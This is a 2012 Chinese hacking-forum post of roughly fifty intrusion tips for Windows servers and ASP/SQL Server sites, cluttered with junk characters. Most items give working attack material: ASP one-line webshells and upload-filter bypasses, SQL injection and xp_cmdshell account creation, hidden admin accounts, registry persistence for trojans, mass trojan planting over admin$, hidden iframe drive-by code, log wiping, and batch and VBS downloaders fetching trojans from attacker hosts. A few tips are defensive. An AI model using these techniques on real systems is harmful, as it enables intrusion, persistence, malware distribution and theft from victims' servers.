中国网络渗透测试联盟

标题: 入侵渗透笔记 [打印本页]

作者: admin    时间: 2012-9-15 14:13
标题: 入侵渗透笔记
Xp系统修改权限防止病毒或木马等破坏系统,cmd下,
! \3 E* U9 @" e" _+ Jcacls C:\windows\system32 /G hqw20:R8 P" m& N: {" B4 j" @9 u
思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入& a& a6 k& b$ d9 S: O* P
恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F& k$ D0 R8 `: T0 A/ k

1 Z" |5 m; U  E2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。6 W$ I8 b# Q5 Y+ m$ x' k

4 x* i# X8 v- l; ]% r! d  E3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。
. a& o+ \  j: D) U0 M7 V* `1 C3 {) H2 z7 z
4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号
* G) |  K2 ^0 O3 q! N# h3 @+ [) Y1 c# p1 i; i1 G
5、利用INF文件来修改注册表
7 c3 w, W% l% N5 |[Version]+ m1 N4 Y  l( H& K
Signature="$CHICAGO$"0 [5 _$ y8 x9 _  v4 B+ _  a
[Defaultinstall]
9 X: B$ B6 w& c0 y$ RaddREG=Ating3 r, y0 }# {6 j9 k" q8 v; b  h
[Ating]' h2 ~( [$ c2 j' a6 s
HKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"- N# T! z0 i7 k, n3 \
以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:
; Y# ]! B9 q' z! K1 j0 s8 |rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径$ r1 y. I: \# ~4 A8 L3 q, n0 c$ x1 j
其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU
8 W3 K8 @( k0 [- _+ l) r7 ~HKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU
: G+ m! @" g# q- cHKEY_CURRENT_CONFIG 简写为 HKCC9 l/ U% h, X3 i" H6 A/ p& n
0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值; S" |* b/ i& y
"1"这里代表是写入或删除注册表键值中的具体数据
8 l7 k/ O8 e4 w( X: j4 \8 ?8 S3 ]6 U) g8 y- b- H5 w2 y
6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,0 A1 k0 [# W# q! {! e- r
多了一步就是在防火墙里添加个端口,然后导出其键值
& g4 X1 ~6 t1 m8 t3 i$ X[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]0 _6 `* r1 D, U3 r7 |4 x
/ Q% F7 \6 ^# g! T
7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽
% \) _2 S( v. D在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。
- q; F( _) p6 Q
: V5 G# }- [( e3 I5 h5 K. O8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。
) p6 F2 {: g9 q( T3 E& A7 x4 m1 ~2 G
9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,# t  ^3 F8 F" D6 }6 u
可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。1 @; E6 E9 d( {& B$ d; `
2 e, x  K! w1 u; k9 X0 F/ m( ?7 T
10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”! [7 p, w- F+ q7 d

% W( H4 a% {; ]11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,
6 U3 G/ x; H4 Z用法:xsniff –pass –hide –log pass.txt
" v. n; U8 ~1 Q8 I
( g+ q6 I2 f; D0 B& z- ]! `12、google搜索的艺术
8 H" [4 ]! C# @- P9 p/ W5 L$ J0 Y& \搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”
/ |' v) \/ T; b4 ]7 I, [或“字符串的语法错误”可以找到很多sql注入漏洞。
9 `2 H3 s5 o+ `" A$ r& Z, w& K2 h' ^! g; L' b  Q2 Z
13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。
: [! E, ^. F' V; k0 R" W8 @3 P! }$ s! }! `" J
14、cmd中输入 nc –vv –l –p 1987
9 f7 I. U$ T8 c& g做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃
! d/ _$ X5 D4 c4 I# m8 [6 g7 ~" r1 B4 V% `
15、制作T++木马,先写个ating.hta文件,内容为
2 r% z8 y" u' V* @<script language="VBScript">
. m  {7 `% `' o8 W) mset wshshell=createobject ("wscript.shell" )2 p/ n! z' N4 m( I
a=wshshell.run("你马的名称",1)5 m8 ~& {+ P3 `
window.close$ @$ v+ [3 _9 {0 I4 P  a3 f! u
</script>4 t0 ^7 ~  ~: s6 N' X
再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。3 q2 `$ |7 i- x/ Q. t4 E

* V6 P1 ]+ Y- @) ]; ?16、搜索栏里输入3 P* {. D* e: F/ m
关键字%'and 1=1 and '%'='
4 |, P% i( s) J2 T8 y0 R4 {关键字%'and 1=2 and '%'='' m6 n6 X4 Z5 V, j+ Z
比较不同处 可以作为注入的特征字符# D. ]: c# }: h  H

2 b% [, Y) K* s5 u' }& B17、挂马代码<html>4 n- p- G  L+ V0 R7 ]
<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>
0 ?% R& z2 N0 l" Z$ h( \, T0 t; H</html>
/ {. W& y4 v9 a1 k% X+ t# u' i8 B; t: `: _6 c3 y
18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,
! B$ q/ m+ C( O9 H$ {6 Y3 n  Unet localgroup administrators还是可以看出Guest是管理员来。
+ `8 o4 n" N# M. z
* W5 l7 V/ b# Y# d4 z19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等& s& P' ~: Y; n/ ~' O6 E+ \; Y1 `
用法: 安装: instsrv.exe 服务名称 路径% R* H( g( S- b6 }
卸载: instsrv.exe 服务名称 REMOVE
* g* r  M9 j0 |6 ]/ i2 r1 L6 v4 ~/ s& s+ x$ l9 b1 Z# _
' e8 O- J- w9 H" c/ }% ?
21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉
# i& W: t' s. }3 ~: V不能注入时要第一时间想到%5c暴库。& S5 Z6 y; R4 ]
; |- Q  g" `& t. c9 e& I; {
22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~1 f" v( Q0 ?( t: M3 E' N4 F$ }% s

4 {+ h6 F! d3 l- Q2 l) Y, |' p# X23、缺少xp_cmdshell时
2 U4 b' Z: ?  x8 }7 C尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'" _& _4 d/ W8 p& x
假如恢复不成功,可以尝试直接加用户(针对开3389的)/ T) Z+ S" v, k: e: {
declare @o int
4 ^7 [( H" U4 r; Cexec sp_oacreate 'wscript.shell',@o out% w+ b! A5 v2 o" w( }
exec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员
* I4 Z% O! J, e2 u4 _& d3 h0 E) X. o7 \+ A# y4 F8 w" [
24.批量种植木马.bat
( C" N+ |/ s( F+ A+ p0 W" L* Ufor /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中1 B5 k. h* U- _( c  E
for /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间
& e/ J) P6 O2 e- P9 @3 f扫描地址.txt里每个主机名一行 用\\开头  t( f+ c. G+ @) o
( y' s3 l0 |2 o; B8 k4 u
25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。# T, ?# b9 m; m8 B0 d+ h( N

" @) o8 @7 t+ J3 v3 j+ f2 |) f9 R  i26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.
  \2 t4 f2 P' Y6 F5 }将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.- j" A) e2 k" d% c1 q. u5 k# U( P
.cer 等后缀的文件夹下都可以运行任何后缀的asp木马+ [; ^, y( k* \2 ?  H! S

0 Q9 x' N2 M/ a: t27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP+ \  @8 C3 L+ |/ Q! a# N3 [: ^; J
然后用#clear logg和#clear line vty *删除日志
+ n( O% T2 }+ z; R( Y9 T
* m  d* U3 p: a! f! Z0 T28、电脑坏了省去重新安装系统的方法
; ^  [' J$ l* N3 t: K3 Z: D纯dos下执行,
# p+ p* a5 e( J7 G% u% M' Exp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config( f( i* Q$ u7 R2 {4 m
2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config
" W$ j8 r) i: N& o8 z1 e
7 _# `! Y8 W, N( @29、解决TCP/IP筛选 在注册表里有三处,分别是:6 y0 z) u. }% R. e- `2 a
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip/ N* n3 ]& z5 w# B; j4 W1 R& D
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
" u: U, {3 t# e, AHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip- C1 u* u, ^# n
分别用3 \* a4 i9 a1 p! R/ K
regedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
. w* k+ n* f  b( D7 G4 Bregedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip/ L7 }  F( J' \4 M0 g. l& [9 V
regedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
  ]9 ]4 d$ x; s. E5 I命令来导出注册表项
1 P, A6 j" t# U$ X0 \然后把三个文件里的EnableSecurityFilters"=dword:00000001,. _$ U  @9 L* b0 ?
改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用$ t* A( V% ~9 |% T
regedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。) X/ \( f2 E1 h' J$ Q6 w& d
1 n# L- B* `5 d
30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U
, x8 V# p. N6 \SER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的3$ v& h6 ?+ E4 f0 U5 j: o
9 w# z) G2 S0 L
31、全手工打造开3389工具4 q) h$ @4 d1 p( J$ e& C+ w
打开记事本,编辑内容如下:* b8 ?* |4 n7 v( u$ A, l
echo [Components] > c:\sql8 c* @8 k& f! A1 \9 f
echo TSEnable = on >> c:\sql
: I4 Q" Z4 c! {" K. [sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q
9 G/ }. p  D+ E9 A6 f编辑好后存为BAT文件,上传至肉鸡,执行6 `4 C& X  [  m5 m+ h$ }

. v& Y* s9 S" P' g32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马
, U0 p; Q( X2 P! U
) o( ]/ W7 }$ V, C2 U33、让服务器重启2 \2 C4 e7 ^1 T* M2 r: Q; h
写个bat死循环:
) T3 H- A  `& o6 b5 {5 `@echo off! z4 Y4 M; k0 g! q
:loop1" U4 x! z- O  E; v0 V
cls! u3 \& J5 ]: s
start cmd.exe
$ \8 V! K+ k6 K3 E6 v, f1 z7 Zgoto loop1
1 L7 O) d1 i, T7 n: F9 M& B+ v$ s保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启7 A' Q: y/ i/ g7 g! }8 I' ~( s3 p7 ]' m
9 d3 E$ a6 R9 h1 t) v; G  z/ D
34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,& |$ h; W5 t. b, E  h
@echo off& B5 E* W) v: e) W( i
date /t >c:/3389.txt
/ O. N& k8 }8 z' ]time /t >>c:/3389.txt4 U& s! z% |, J$ i- ~! m
attrib +s +h c:/3389.bat
4 f0 E; P6 q& n. iattrib +s +h c:/3389.txt
, {7 T3 S% f- D% Fnetstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt
( f8 i  [2 i, p' M' T, t: P/ u并保存为3389.bat
) U2 ^2 F; i% D2 ]打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号
) p1 v$ T% u" U5 k, ^
, M6 p/ b6 h: g7 J35、有时候提不了权限的话,试试这个命令,在命令行里输入:
2 m2 f4 W. U3 ?3 jstart http://www.hack520.org/muma.htm然后点执行。(muma.htm是你上传好的漏洞网页)
7 ]* a9 A% X) H5 G: t# b# _6 G7 o输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。. R4 K- B7 `2 Q# W" I: l4 d
. d' n) m* L- \9 N% o6 ^' v
36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件0 T: ~* e1 R. i6 `
echo open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址0 M- d( D9 \6 w$ n$ m
echo 你的FTP账号 >>c:\1.bat //输入账号0 g8 I7 A- g2 U! H% c0 Y6 d- ^
echo 你的FTP密码 >>c:\1.bat //输入密码
# y  T) J% ^- b0 T; |" uecho bin >>c:\1.bat //登入; P) M8 c/ C/ J; n
echo get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么( `/ g: q" k  A7 X1 A( V
echo bye >>c:\1.bat //退出
, E  v% F9 ]& D: d) o' c5 W. h1 p. e然后执行ftp -s:c:\1.bat即可& R, T; Y+ N2 S. z; d' q; [3 {
9 y  e" [" `2 Z6 j
37、修改注册表开3389两法; R& B1 @# _5 s8 C/ n; D
(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表& M2 c6 H1 l& J( X/ ^- P
echo Windows Registry Editor Version 5.00 >>3389.reg  e; ?! O, w# Y
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg
2 m4 Z; X9 m6 Xecho "Enabled"="0" >>3389.reg( G' r  z7 A# W1 g( s1 K; P
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
- z+ a) w: \6 L6 ^. vNT\CurrentVersion\Winlogon] >>3389.reg
' V& t: d- t# c) K& U' |! o4 Yecho "ShutdownWithoutLogon"="0" >>3389.reg( H) s" {% @5 Q; [- V9 }
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]3 t' D5 [% X% O1 k$ W2 _, `. r# i
>>3389.reg
" C2 k6 {, v/ Techo "EnableAdminTSRemote"=dword:00000001 >>3389.reg' L" W1 o$ o, H, b# [6 G3 p' o
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
( E# P$ i) Q$ X+ F4 t>>3389.reg
  [/ E! i: G+ _' h# l; ~4 V9 }( Recho "TSEnabled"=dword:00000001 >>3389.reg
5 e" _5 P) D5 y8 ]' ^echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg
1 c% @6 G4 B1 w+ }  j4 i! K) Vecho "Start"=dword:00000002 >>3389.reg. d: _5 f/ w! P) B  v
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]- |: b3 z6 N5 E( q  Y; n+ I
>>3389.reg: j2 M  {  ~6 C  w1 m
echo "Start"=dword:00000002 >>3389.reg
5 X( p! i% d2 n4 w$ vecho [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg
7 c4 m. r" k( p, F5 u6 T& K! ?9 Pecho "Hotkey"="1" >>3389.reg
7 t: {, K( A4 S. i3 z" Iecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal3 `* M* u# T3 ^
Server\Wds\rdpwd\Tds\tcp] >>3389.reg3 i# \1 j/ }9 l) V! L
echo "PortNumber"=dword:00000D3D >>3389.reg$ d0 t4 R! p5 |- V1 p- r) T3 \
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal4 a8 n& B6 Z# s( d
Server\WinStations\RDP-Tcp] >>3389.reg
3 Y" ~" g0 ]6 Kecho "PortNumber"=dword:00000D3D >>3389.reg
5 k) S: ^, h" y# f4 N% J& }把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。
( z5 a: c* j$ Y) W3 a# @( d(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)
' `5 \9 T- a# n; c8 O因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效
0 u8 l2 x: p9 v9 `, g(2)winxp和win2003终端开启
; Y' f5 }7 b+ {% P6 c用以下ECHO代码写一个REG文件:# o1 V7 A1 k) g* S' @- s3 B% E) S$ u
echo Windows Registry Editor Version 5.00>>3389.reg
* q7 L( t/ \8 }; W3 Qecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal6 I; y0 p5 w: z" H* V5 g4 z8 ~4 E
Server]>>3389.reg
, R* A7 T1 `/ J0 y- s! Recho "fDenyTSConnections"=dword:00000000>>3389.reg
# G* _4 r5 |% |1 _6 h* Mecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal7 |4 D* N; K( @/ O5 {
Server\Wds\rdpwd\Tds\tcp]>>3389.reg
) y: n# K. K, }( B% D3 \echo "PortNumber"=dword:00000d3d>>3389.reg+ T8 |5 P' y) \! d! p
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
' G6 Y. m" |3 dServer\WinStations\RDP-Tcp]>>3389.reg- I: N, B" h" a+ C
echo "PortNumber"=dword:00000d3d>>3389.reg
8 W! p) o6 _/ S6 m- d$ n+ S然后regedit /s 3389.reg del 3389.reg2 q& O5 j# s2 j0 i2 I9 Q% D$ y' u
XP下不论开终端还是改终端端口都不需重启
  @! g: W* N9 i5 E/ ?3 W
- |% W+ \" E9 d+ Q6 D38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃
" m2 h1 N; ?: O3 k% t用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'
( z7 |5 A( u6 j, _7 ]0 R  s  @
: M* F+ X4 Z2 ?5 X, t2 }39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!
" ?  T( e, S4 w5 v. }(1)数据库文件名应复杂并要有特殊字符
0 i: u1 f& T% t' ?(2)不要把数据库名称写在conn.asp里,要用ODBC数据源; d6 N, n& F1 J6 C4 {# W3 _
将conn.asp文档中的+ ]3 m1 ^) B  b9 h' _& K! V3 a' V
DBPath = Server.MapPath("数据库.mdb")
/ ^3 B# L9 D9 E7 K' Vconn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath
5 Q( ^4 d. W0 v1 ?$ {4 [, h; L9 V/ F( K) p: U8 q4 b% T5 D( S
修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置- X  I6 o; C; t. K! K$ {1 A
(3)不放在WEB目录里( ?  m9 y+ h  j& n
' J  w4 p5 Y% |6 y0 T% t
40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉
* p" \# l0 Q! l0 d: i4 O可以写两个bat文件, o% j, D9 d/ }
@echo off
) g' H, x$ v) r@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe' X# q- M: [8 ~2 d( [+ V% |2 Z
@del c:\winnt\system32\query.exe
( u6 h, A" [6 _$ b5 y# }0 I- v@del %SYSTEMROOT%\system32\dllcache\query.exe: R' i! O% Q# |! \7 ]2 Q' g
@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的8 p. p7 V% t5 }3 q) R$ o1 W; V3 S
0 C7 W0 K( j$ p
@echo off
9 ~+ _7 v, n0 Q2 N% s* w@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe8 R/ `* o  W+ Z' k9 T5 p* s" s
@del c:\winnt\system32\tsadmin.exe
; P4 I% j( e4 ?@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex
+ C/ E( C9 ^" X$ z: D: A) z! Y- q% j
41、映射对方盘符
7 D; j% C. E. U- N, e0 f5 Z5 b" utelnet到他的机器上,
9 A# W$ ^) \" tnet share 查看有没有默认共享 如果没有,那么就接着运行* N+ C3 \# c7 K4 `2 d6 E
net share c$=c:3 i, F& s, u+ U3 C. `
net share现在有c$
8 N8 V5 |5 H1 k/ v4 J: d: F在自己的机器上运行
$ Y# Z) j7 i1 {4 k; gnet use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K
) [- c2 G# f1 r7 x9 X+ E" @% f5 _; G# |4 P; W, d. i
42、一些很有用的老知识
1 N  Q; Q- V( Ytype c:\boot.ini ( 查看系统版本 )% S/ r" T7 I. I& ]# c
net start (查看已经启动的服务)
  r% ^3 c5 Q: D3 dquery user ( 查看当前终端连接 )
" v2 u0 o6 T- p) @; bnet user ( 查看当前用户 )# h4 U7 t* Z3 \+ r  @
net user 用户 密码/add ( 建立账号 )/ I4 o3 \$ ?2 F
net localgroup administrators 用户 /add (提升某用户为管理员)
3 \1 _- d2 j1 _ipconfig -all ( 查看IP什么的 )/ a, D' S' X2 g5 z; W" W' u& _2 f
netstat -an ( 查看当前网络状态 )
; J7 b" D9 t  k' wfindpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)! y; l2 f8 _1 q) g" d$ e! j8 ]
克隆时Administrator对应1F4
, |' J1 c, U( x" F4 h: Zguest对应1F52 Y* E1 u, N/ P2 T
tsinternetuser对应3E84 a; F1 \/ n8 r7 b- T
: ~7 U# e8 ^, N
43、如果对方没开3389,但是装了Remote Administrator Service
& Y. g* D8 r* v5 Z6 `9 @用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接
- @* B* }$ |7 V, x7 g: {! V解释:用serv-u漏洞导入自己配制好的radmin的注册表信息
* |8 f, Q3 J) n# G* O* L先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"6 N# ?. |  ~! Z% ^1 Z
7 _; }( L6 S4 n$ D% A: b, s4 D
44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定)5 B; n" i+ K, r% E: W6 C
本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口)
7 C* q) \  @9 }# Q) t- b5 ~1 F8 y9 a8 \; z
45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入)0 }/ l" W" L6 ^, L. L4 Z% ~
echo Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open# m2 c& C7 t5 t$ r9 R4 l% b
^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =
( d& N# Q3 j. d- r! D- u9 A4 Z: {CreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =+ T" U% V4 o7 V
1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs
! R) h2 \! T% Q. B  u(这是完整的一句话,其中没有换行符)
% _, ~1 ~5 q' U7 j7 i2 z2 c然后下载:9 o+ `+ U* a$ H, ^) b
cscript down.vbs http://www.hack520.org/hack.exe hack.exe; [/ }) T+ |. _9 L; l  Y
( i. U9 i6 F& J
46、一句话木马成功依赖于两个条件:4 G( H; z/ R5 ~7 m8 E
1、服务端没有禁止adodb.Stream或FSO组件
/ o& r7 h7 N* r6 \# r2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。
9 L/ U9 b' z  S) L- k* s: g# }
" `8 w3 b; E" H# H8 A! g( ?5 O47、利用DB_OWNER权限进行手工备份一句话木马的代码:
- q% N: H( N9 v' ^$ e; L/ r;alter database utsz set RECOVERY FULL--+ C' ]7 v0 A- d' @) J
;create table cmd (a image)--3 j/ ]4 x3 N& P; n
;backup log utsz to disk = 'D:\cmd' with init--
9 u' V- \1 h0 W4 Q' f) T1 w9 z;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--
* u; N. g& P; P! l7 f;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--
  {4 n9 c: s; h* k7 B注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。
( o7 o$ W8 O0 W" R, t& c# ]4 _
5 R& X' [) j8 e) @  L9 D. B3 ]48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:
6 ^) i3 _% p  @& `- F3 w& [/ h1 f7 D; K5 B1 r0 g# r/ n  Z' b% V
用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options: ~  ~( e3 M  \+ f& `! H
所有会话用 'all'。
/ G3 W$ C+ K1 |. G; R- n-s sessionid 列出会话的信息。
9 ]; @; Y  B3 O6 c: r8 ]-k sessionid 终止会话。0 I/ g+ A) _4 j- O0 z' m+ t  K+ g
-m sessionid 发送消息到会话。
* o+ K( `& T4 m( r3 G, p
( K$ d8 ^6 K) G, y  X1 J( O' Bconfig 配置 telnet 服务器参数。
- t. Q, m% C5 P0 B2 y' S2 u4 g0 _6 ]. r  |+ R9 \% U
common_options 为:
% Q. t! B  C3 H4 a  l' I) K-u user 指定要使用其凭据的用户
# c, s6 _8 L9 l' ?-p password 用户密码
, K' s  @6 x3 s; w3 p1 H# j8 U! ^) q9 O' N# q8 d9 }; {, v1 g
config_options 为:
/ j1 ~3 F* E6 x% p- A0 Rdom = domain 设定用户的默认域
- m" p7 X. K- R! W4 `ctrlakeymap = yes|no 设定 ALT 键的映射
# i/ |, [0 ~7 L" e6 ^! D$ Q5 Ttimeout = hh:mm:ss 设定空闲会话超时值
- W, P! {9 z2 R" o4 I; s. Htimeoutactive = yes|no 启用空闲会话。( \# X/ T5 z7 N4 e9 l' u6 O
maxfail = attempts 设定断开前失败的登录企图数。  l; Q9 a8 X1 s# Y
maxconn = connections 设定最大连接数。
  G* N  J: e  v6 xport = number 设定 telnet 端口。
  c% P2 V% A( @! g2 b7 Zsec = [+/-]NTLM [+/-]passwd5 q$ i4 s0 k/ D5 ~
设定身份验证机构' U7 b5 _; f0 F+ d; U% m
fname = file 指定审计文件名。. H/ [5 A2 P  l+ o
fsize = size 指定审计文件的最大尺寸(MB)。; l4 I% c/ Z0 D2 O: ?. W6 u& o) Q8 B3 [
mode = console|stream 指定操作模式。+ l  ^  T9 j( V/ j4 G% {  ~  r
auditlocation = eventlog|file|both
8 x5 l" R) ^, }- X) |指定记录地点7 L3 R( s$ v2 `
audit = [+/-]user [+/-]fail [+/-]admin
  R' [9 ]- ?( Y/ w0 C  I; _  Y& l2 ]/ p2 R; {2 [0 [
49、例如:在IE上访问:
/ [# F: \2 m# s' o) _* {' ^3 ?9 Fwww.hack520.org/hack.txt就会跳转到http://www.hack520.org/
6 Y6 a. }. @* p2 \0 Z. mhack.txt里面的代码是:
+ V" l# l+ A9 n# g( X3 M<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">6 L( L6 y! p. W/ y* ~
把这个hack.txt发到你空间就可以了!
0 [% o" c# I( _5 ^8 y5 m  ?7 G这个可以利用来做网马哦!
8 a# d/ h& y# O2 ~7 f1 s: y7 k% p; C: X( B0 U
50、autorun的病毒可以通过手动限制!" a' t# O! _9 K* O. Q6 r
1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!4 U, [0 o5 J- k2 H
2,打开盘符用右键打开!切忌双击盘符~
9 D  t) }) r; h  ^9 l& s* h3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!5 x9 h" O. F  y7 U$ g/ o  e1 n1 ^
' [5 _  u' w) p9 s; s) m2 m6 I
51、log备份时的一句话木马:
) a1 u' y6 i6 p" `$ ra).<%%25Execute(request("go"))%%25>
% r. p  C8 j; Kb).<%Execute(request("go"))%>" B; p) a* B6 ]
c).%><%execute request("go")%><%
% F2 t) r/ L- a( Q9 b$ ud).<script language=VBScript runat=server>execute request("sb")</Script>- v) k5 b0 A# ?1 Y! |
